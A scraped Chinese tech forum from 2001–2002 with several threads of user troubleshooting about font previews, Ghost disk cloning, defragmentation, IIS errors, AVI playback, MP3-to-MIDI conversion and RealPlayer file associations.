 发表于 2001-11-06 17:28:59 按此观看飞扬的个人资料 按此发邮件给飞扬 访问飞扬的主页 飞扬 的 oicq 是762784,查看 762784 的资料 发送悄悄话给飞扬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看飞扬的IP
装一个插件,用ACDSEE也可以和看图一样的看!

现在找不到了这个插件

啊 . 咪 . 哩 . 哟 . 哎 . 吗 . 哈 . 呀 . 哦 . 咦 . 嚓 . 唙 . 嘻 . 啦

Blueidea Web Team
Moderator of Art + Design Forum

danger

|危险|
积分：4264
发帖：4253
来自：}Earth{
注册：2001-06-15
 发表于 2001-11-06 18:32:26 按此观看danger的个人资料 按此发邮件给danger 访问danger的主页 danger 的 oicq 是4297246,查看 4297246 的资料 发送悄悄话给danger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看danger的IP
这里

Dangerous...

Blueidea Web Team
Moderator Of Flash forum

frankwuhong

终级用户
积分：483
发帖：169
来自：大连
注册：2001-05-19
 发表于 2001-11-07 08:45:50 按此观看frankwuhong的个人资料 按此发邮件给frankwuhong 访问frankwuhong的主页 发送悄悄话给frankwuhong 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看frankwuhong的IP
我下载了，怎么用呀！！！！！！！！！！！！！！！！！

我总是和孤独的人一起孤独
http://www.lonelycat.tk
danger

|危险|
积分：4264
发帖：4253
来自：}Earth{
注册：2001-06-15
 发表于 2001-11-07 08:50:32 按此观看danger的个人资料 按此发邮件给danger 访问danger的主页 danger 的 oicq 是4297246,查看 4297246 的资料 发送悄悄话给danger 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看danger的IP
frankwuhong在上个帖子中说
引用:
我下载了，怎么用呀！！！！！！！！！！！！！！！！！

怎么用还用我说吗？
有什么不懂发邮件给我吧！

Dangerous...

Blueidea Web Team
Moderator Of Flash forum

frankwuhong

终级用户
积分：483
发帖：169
来自：大连
注册：2001-05-19
 发表于 2001-11-07 09:27:54 按此观看frankwuhong的个人资料 按此发邮件给frankwuhong 访问frankwuhong的主页 发送悄悄话给frankwuhong 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看frankwuhong的IP
好用了，你把文件的后缀是css的，我搞糊涂了，我把css去掉就好用了

我总是和孤独的人一起孤独
http://www.lonelycat.tk
razor

初级用户
积分：30
发帖：15
来自：杭州
注册：2001-12-07
 发表于 2001-12-22 16:18:05 按此观看razor的个人资料 按此发邮件给razor 访问razor的主页 razor 的 oicq 是7605942,查看 7605942 的资料 发送悄悄话给razor 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看razor的IP
fontlist

我是Razor
上一贴 | 下一贴
快速回复 | 主题：对了,安装字体有什么软件可以预览字体吗?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


我的painter怎么花了?

计算机技术
我的painter怎么花了?

上一贴 | 下一贴
发表人 主题: 我的painter怎么花了?
冷语

Fierce
现任版主
积分：13250
发帖：5007
来自：BeiJing
注册：2001-03-06
 发表于 2001-11-02 22:13:31 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 收藏该主题供以后查看 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP
装了ps6就这样了

[ Come As You Are ]

Blueidea Web Team
Moderator Of Flash forum

赵鹏

初级用户
积分：9
发帖：1191
来自：福建福州
注册：2001-04-02
 发表于 2001-11-02 22:21:08 按此观看赵鹏的个人资料 按此发邮件给赵鹏 赵鹏 的 oicq 是7070770,查看 7070770 的资料 发送悄悄话给赵鹏 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看赵鹏的IP
去掉启动项中的adobe伽玛调整器
试试看

去年元夜时　花市灯如昼　月上柳梢头　人约黄昏后
今年元夜时　月与灯依旧　不见去年人　泪湿青衫袖
冷语

Fierce
现任版主
积分：13250
发帖：5007
来自：BeiJing
注册：2001-03-06
 发表于 2001-11-02 22:26:05 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP
还一样啊...

[ Come As You Are ]

Blueidea Web Team
Moderator Of Flash forum

冷语

Fierce
现任版主
积分：13250
发帖：5007
来自：BeiJing
注册：2001-03-06
 发表于 2001-11-02 22:31:44 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP
哈哈
做天当完的......
现在是16位真彩色
可以上到32位...

[ Come As You Are ]

Blueidea Web Team
Moderator Of Flash forum

windangel

终级用户
积分：1258
发帖：609
来自：风之国度
注册：2001-02-28
 发表于 2001-11-02 22:44:56 按此观看windangel的个人资料 按此发邮件给windangel 访问windangel的主页 windangel 的 oicq 是870777,查看 870777 的资料 发送悄悄话给windangel 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看windangel的IP
系统内核难说有没有问题,估计是显卡不兼容!

[这消息被windangel编辑过(编辑时间2001-11-02 22:44:43)]

Blueidea Web Team
Moderator Of multimedia forum
冷语

Fierce
现任版主
积分：13250
发帖：5007
来自：BeiJing
注册：2001-03-06
 发表于 2001-11-02 23:06:12 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP
没装ps6就不是这样

[ Come As You Are ]

Blueidea Web Team
Moderator Of Flash forum

hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-03 12:03:06 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
不会是显示器的问题吧。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
冷语

Fierce
现任版主
积分：13250
发帖：5007
来自：BeiJing
注册：2001-03-06
 发表于 2001-11-03 12:48:14 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP
倒
不会吧
没装ps时就这样

[ Come As You Are ]

Blueidea Web Team
Moderator Of Flash forum

moonbus

林 川
现任版主
积分：2103
发帖：1929
来自：上海
注册：2000-07-31
 发表于 2001-11-05 11:45:07 按此观看moonbus的个人资料 按此发邮件给moonbus 访问moonbus的主页 moonbus 的 oicq 是447277,查看 447277 的资料 发送悄悄话给moonbus 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看moonbus的IP
换成32位色就正常了

蓝蓝天空，太阳公公，狗狗追着小蜜蜂，夏天的风吹着我进入梦中，看见爸爸妈妈在梦中，我做着甜甜蜜蜜地美梦……
anart

终级用户
积分：613
发帖：313
来自：China,Cocoon
注册：2001-06-05
 发表于 2001-11-05 15:30:27 按此观看anart的个人资料 按此发邮件给anart 发送悄悄话给anart 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看anart的IP
和ps一点关系都没有：）

我藏起自己的羽翼，孤独收场。在钢筋水泥的茧中，枯然作化
冷语

Fierce
现任版主
积分：13250
发帖：5007
来自：BeiJing
注册：2001-03-06
 发表于 2001-11-07 13:35:13 按此观看冷语的个人资料 按此发邮件给冷语 冷语 的 oicq 是6577192,查看 6577192 的资料 发送悄悄话给冷语 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看冷语的IP
终于解决了
谢谢

[ Come As You Are ]

Blueidea Web Team
Moderator Of Flash forum

上一贴 | 下一贴
快速回复 | 主题：我的painter怎么花了?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


ghost 2001可以克隆ntfs的Win2k吗？

计算机技术
ghost 2001可以克隆ntfs的Win2k吗？

上一贴 | 下一贴
发表人 主题: ghost 2001可以克隆ntfs的Win2k吗？
cinkey

我和我追逐的梦
积分：1132
发帖：2183
来自：杭州
注册：2001-06-21
 发表于 2001-11-06 20:03:19 按此观看cinkey的个人资料 按此发邮件给cinkey 访问cinkey的主页 cinkey 的 oicq 是23516844,查看 23516844 的资料 收藏该主题供以后查看 发送悄悄话给cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cinkey的IP
我的win2000是ntfs的

 悠長假期   |  反恐联盟  |  CS服务器状态查看  |  CS反作弊客户端
2smile

活着就好
积分：1622
发帖：1907
来自：SD
注册：2001-05-13
 发表于 2001-11-06 20:16:47 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
到dos下，用ghost 7.0便可以，保证你有一个fat32分区，可以把nfts分区写到fat32的image.

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
Eggplant

初级用户
积分：103
发帖：28
来自：深圳市
注册：2002-04-29
 发表于 2002-05-09 09:06:26 按此观看Eggplant的个人资料 按此发邮件给Eggplant 发送悄悄话给Eggplant 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Eggplant的IP
dos下能看到ntfs分区吗？

I love this game
linyifei2000

超级用户
积分：426
发帖：172
来自：Canada
注册：2002-05-02
 发表于 2002-05-09 09:14:47 按此观看linyifei2000的个人资料 按此发邮件给linyifei2000 访问linyifei2000的主页 linyifei2000 的 oicq 是34192942,查看 34192942 的资料 发送悄悄话给linyifei2000 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看linyifei2000的IP
……老兄，最好的办法是你有刻录机，企业版的Ghost可以直接支持刻录光盘。我的三个分区都是NTFS，照样GHOST！！！就是因为DOS下不能识别NTFS，所以二楼的兄弟让你的分区中有一个Fat32,为的就是当你还原的时候，能找到那个分区。还有一种方法就是用完整版的GHOST做一个启动盘，用它来启动，这样直接进入GHOST界面，不用Fat32的也没事了，在下对Ghost小有研究。有什么问题再问，或者发短信息

p.s. 我用的是GHOST7.5

忘了回答你的问题了，2001不能刻录NTFS的（也不知是不是我没调出来，反正第一次用的时候不行，一怒之下企业版了）

[这消息被linyifei2000编辑过(编辑时间2002-05-09 09:24:45)]

大海呀，全是水；骏马呀，四条腿；吃饭呀，要用嘴；小便呀，叉开腿…… %*&^%^&%^&%^%^^&*
上一贴 | 下一贴
快速回复 | 主题：ghost 2001可以克隆ntfs的Win2k吗？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于VoptMe的问题

计算机技术
关于VoptMe的问题

上一贴 | 下一贴
发表人 主题: 关于VoptMe的问题
孤翎

初级用户
积分：0
发帖：1
来自：Amoy·Fu
注册：2001-11-06
 发表于 2001-11-06 07:07:10 按此观看孤翎的个人资料 按此发邮件给孤翎 访问孤翎的主页 孤翎 的 oicq 是24487025,查看 24487025 的资料 收藏该主题供以后查看 发送悄悄话给孤翎 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看孤翎的IP
哪位大虾用过VoptMe，我用它整理C盘总会死机，但整理D盘就没问题，有谁能帮我解决？还有，哪里有Protel2.x for windows的英文版可以下载？我只找到中文版的。
先在这里谢谢各位啦~~~
2smile

活着就好
积分：1622
发帖：1907
来自：SD
注册：2001-05-13
 发表于 2001-11-06 08:32:13 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
可能是程序冲突吧。
试一下Diskeeper或者Norton speed disk呢。

http://www.protel.com/ 官方网站上便有下载吧。

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
Quester

鼠标说话
是个版主
积分：2604
发帖：1175
来自：GTA
注册：2000-08-28
 发表于 2001-11-06 09:09:00 按此观看Quester的个人资料 按此发邮件给Quester 发送悄悄话给Quester 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Quester的IP
孤翎在上个帖子中说
引用:
哪位大虾用过VoptMe，我用它整理C盘总会死机，但整理D盘就没问题，有谁能帮我解决？还有，哪里有Protel2.x for windows的英文版可以下载？我只找到中文版的。
先在这里谢谢各位啦~~~

呵呵，你一定没有关闭所有在背后运行的程序才来执行整理硬盘吧？

它会不断中断，不断刷新，不断……不断……所以，就死了

VOPTME 不错，但是记得用完后最好再用windows的磁盘整理跑一次，因为VOPTME有时会虚报磁盘剩余空间，不准确。

下载 ColorKey 试用版 解决配色问题
逢对手鼠标说话，仗一键快意恩仇！
...乍暖還寒時候，最難將息...
Blueidea Web Team
Moderator of Art & Design
孤翎

初级用户
积分：0
发帖：1
来自：Amoy·Fu
注册：2001-11-06
 发表于 2001-11-06 16:57:17 按此观看孤翎的个人资料 按此发邮件给孤翎 访问孤翎的主页 孤翎 的 oicq 是24487025,查看 24487025 的资料 发送悄悄话给孤翎 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看孤翎的IP
谢谢两位的解答
不过，如果说是“没有关闭所有在背后运行的程序才执行整理硬盘”，那我D盘应该也是没法整理的，但我D盘能整理呀，不过，我还是改用其他的工具好了
maobi

初级用户
积分：117
发帖：30
来自：浙江江山
注册：2000-12-04
 发表于 2002-04-19 17:01:19 按此观看maobi的个人资料 按此发邮件给maobi 发送悄悄话给maobi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看maobi的IP
孤翎在上个帖子中说
引用:
谢谢两位的解答
不过，如果说是“没有关闭所有在背后运行的程序才执行整理硬盘”，那我D盘应该也是没法整理的，但我D盘能整理呀，不过，我还是改用其他的工具好了

倒！不说还不知道你这么菜！
“没有关闭所有在背后运行的程序才执行整理硬盘”的意思是：不能有其他程序在整理硬盘的同时对硬盘进行读写操作。

:::::我静静的看着这个世界:::::
huang

初级用户
积分：28
发帖：9
来自：
注册：2002-04-09
 发表于 2002-04-19 17:17:47 按此观看huang的个人资料 按此发邮件给huang 发送悄悄话给huang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看huang的IP
下载voptxp试一下吧，它的稳定性不错！
huang

初级用户
积分：28
发帖：9
来自：
注册：2002-04-09
 发表于 2002-04-19 17:22:39 按此观看huang的个人资料 按此发邮件给huang 发送悄悄话给huang 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看huang的IP
唉！忘记告诉你网址http://downs.126.com的软件分类的>系统软件 > 磁盘工具 那里有很多的好东西呢！！
dancing

叶恨花
现任版主
积分：4724
发帖：2226
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-04-19 17:48:22 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
可能跟C盘上保存的系统设置，比如虚拟内存占用的空间，正调用的程序等冲突，其他盘的问题就相对轻一些~

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

onlysnake

终级用户
积分：1971
发帖：696
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-04-19 23:17:50 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
VOPTXP好象不太好用呀

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

上一贴 | 下一贴
快速回复 | 主题：关于VoptMe的问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于IIS的问题，高手帮忙！

计算机技术
关于IIS的问题，高手帮忙！

上一贴 | 下一贴
发表人 主题: 关于IIS的问题，高手帮忙！
菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-11-06 11:06:29 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 收藏该主题供以后查看 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
我的操作系统是win2k server，可是每次运行IIS就会出现如下提示框

怎么样解决？？？难道非得要重装win2k吗？

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

蓝色

管理员|蓝色
积分：13787
发帖：5829
来自：China
注册：2000-06-16
 发表于 2001-11-06 11:09:31 按此观看蓝色的个人资料 该用户不允许显示它的电子邮件 访问蓝色的主页 发送悄悄话给蓝色 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看蓝色的IP
不用，添加程序里，删除一下IIS，再加一次，应该可行。

子曰：无欲速，无见小利。欲速则不达，见小利则大事不成。

Blueidea Web Team
Team Leader

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-06 11:22:56 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
查毒```

检查系统文件有没有丢失,,

装完win2000 server 就不能用这个??

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

菜菜子

肥皂泡泡
积分：3383
发帖：1620
来自：肥皂泡泡的世界
注册：2000-08-10
 发表于 2001-11-06 11:23:58 按此观看菜菜子的个人资料 按此发邮件给菜菜子 访问菜菜子的主页 菜菜子 的 oicq 是7347578,查看 7347578 的资料 发送悄悄话给菜菜子 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看菜菜子的IP
好了，弄好了！谢谢蓝色！

:: 落霞与孤骛齐飞，秋水共长天一色。::

--熙宁街43号--

Blueidea Counter Strike Team
=Blueidea=Caicaizi

yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-06 11:31:28 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
蓝色在上个帖子中说
引用:
不用，添加程序里，删除一下IIS，再加一次，应该可行。

通常这样~重装了IIS也没有用~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 | 主题：关于IIS的问题，高手帮忙！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


大家知道avi格式的文件用什么播放？？

计算机技术
大家知道avi格式的文件用什么播放？？

上一贴 | 下一贴
发表人 | 主题: 大家知道avi格式的文件用什么播放？？
frenk 初级用户 积分：54 发帖：16 来自： 注册：2002-01-30 | 发表于 2002-05-17 12:35:45 按此观看frenk的个人资料 按此发邮件给frenk 收藏该主题供以后查看 发送悄悄话给frenk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看frenk的IP 同标题 天大地大
啸 无意 现任版主 积分：5736 发帖：1962 来自： 注册：2000-08-01 | 发表于 2002-05-17 12:38:23 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP 媒体播放器就行吧。 Blueidea Web Team. Moderator Of Computer Technology Forum
arrive 终级用户 积分：1231 发帖：410 来自：大连 注册：2000-12-02 | 发表于 2002-05-17 16:54:54 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP 现在还有不支持这种格式的播放器 那么他可以退出了 Нельзя выпустить из руквозможностъ,которая случается в жизнь.
yunbin 经典强盗 现任版主 积分：2292 发帖：1001 来自：火星 注册：2001-09-27 | 发表于 2002-05-17 19:51:16 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP 估计是因为你没有装mpeg4插件...所以有些avi不能放.... http://www.keyabroad.com/jnd/MPG4.zip 下载安装 http://download.pchome.net/multimedia/mpeg4/player/ A man can succeed at almost anything for which he has unlimited enthusiasm. Blueidea Web Team Moderator Of Computer Technology Forum
上一贴 | 下一贴
快速回复 | 主题：大家知道avi格式的文件用什么播放？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


mp3怎么转成midi

计算机技术
mp3怎么转成midi

上一贴 | 下一贴
发表人 | 主题: mp3怎么转成midi
CrazyParty 群山之巅 积分：2164 发帖：811 来自：温州 注册：2000-10-14 | 发表于 2002-05-17 12:53:47 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 收藏该主题供以后查看 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP mp3怎么转成midi,谢谢 这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
ImHow 怎样 积分：2137 发帖：566 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-05-17 16:34:38 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 解霸好象可以哦 你去下一个软件 欲说还休 欲说还休 却道天凉好个秋 唯有不断学习 才能不断进步
silentlamb 初级用户 积分：52 发帖：13 来自： 注册：2001-11-09 | 发表于 2002-05-17 16:54:18 按此观看silentlamb的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给silentlamb 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看silentlamb的IP 这都可以？mp3主要是人声，midi只能实现乐器合成，mp3应该不可以转成midi的吧？难道听的都是纯音乐的mp3?
天蓝 高级用户 积分：229 发帖：67 来自：蓝色天空 注册：2002-05-17 | 发表于 2002-05-17 17:02:13 按此观看天蓝的个人资料 该用户不允许显示它的电子邮件 天蓝 的 oicq 是2923431,查看 2923431 的资料 发送悄悄话给天蓝 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天蓝的IP 一些软件只是能转换格式，就是把人声，乐器声都压在一起，变成MIDI。不会是你想要的效果。建议学学音乐，然后用演奏软件把MP3演奏出来，保存成midi。 天空是什么颜色的，如果汪洋是蓝色的；我说天空也是蓝色的，因为他们彼此相爱了。
51windows 海娃 积分：2284 发帖：682 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-05-17 18:49:32 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 多种格式转成MP3,超级解霸2001全搞定 http://it.sohu.com/96/02/it_article15300296.shtml 相关软件： http://www.mp4cn.com/2001htm/txt-audio.htm 我收藏的MIDI http://www.52nh.com/hw/date/midi/ 还有很多，是以前上传的，现在上了宽带了，有时间把所有的在一块打包上传！ Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 系统出问题了?请看！
上一贴 | 下一贴
快速回复 | 主题：mp3怎么转成midi
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


问怎么样实现AVI的再线观看！

计算机技术
问怎么样实现AVI的再线观看！

上一贴 | 下一贴
发表人 | 主题: 问怎么样实现AVI的再线观看！
tiefan 初级用户 积分：140 发帖：36 来自： 注册：2001-12-01 | 发表于 2002-05-16 04:42:38 按此观看tiefan的个人资料 按此发邮件给tiefan 收藏该主题供以后查看 发送悄悄话给tiefan 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看tiefan的IP 我在帮学校做电影的再线观看，电影的格式很多是AVI的，我做了连接，但每次点击都是把*.avi下载到本机上才能看，问怎么样实现AVI的再线观看？？？？MMS有是什么协议？？？？？ =为人谦虚，才华横溢=
上一贴 | 下一贴
快速回复 | 主题：问怎么样实现AVI的再线观看！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


安完realplayer出现的问题 - 经 典 论 坛

计算机技术
安完realplayer出现的问题

上一贴 | 下一贴
发表人 主题: 安完realplayer出现的问题
rabbitlin

高级用户
积分：201
发帖：125
来自：北京
注册：2001-02-05
 发表于 2002-05-15 15:32:17 按此观看rabbitlin的个人资料 按此发邮件给rabbitlin 访问rabbitlin的主页 收藏该主题供以后查看 发送悄悄话给rabbitlin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看rabbitlin的IP
安完以后，所有的mp3图标全变成了realplayer图标，并且打开方式也变成 了由realplayer打开，如何改回来

:::Pink Rabbit Outside The Forest:::
[ Welcome to PRHOUSE ]
18

超级用户
积分：317
发帖：95
来自：NN,GX,CN
注册：2002-05-06
 发表于 2002-05-15 15:41:01 按此观看18的个人资料 按此发邮件给18 访问18的主页 18 的 oicq 是22770777,查看 22770777 的资料 发送悄悄话给18 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看18的IP
启动realplayer，“视图”->“首选项”->“升级”->“自动恢复设置”，然后找到MP3并勾掉就行了。

--Welcome to my Forum!--
18

超级用户
积分：317
发帖：95
来自：NN,GX,CN
注册：2002-05-06
 发表于 2002-05-15 15:44:23 按此观看18的个人资料 按此发邮件给18 访问18的主页 18 的 oicq 是22770777,查看 22770777 的资料 发送悄悄话给18 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看18的IP
或是：
找到任一mp3文件，按着“Shift”键，然后右键点击，在“打开方式”中再选回你原来的mp3播放器就行了。

--Welcome to my Forum!--
rabbitlin

高级用户
积分：201
发帖：125
来自：北京
注册：2001-02-05
 发表于 2002-05-15 16:47:31 按此观看rabbitlin的个人资料 按此发邮件给rabbitlin 访问rabbitlin的主页 发送悄悄话给rabbitlin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看rabbitlin的IP
thanks

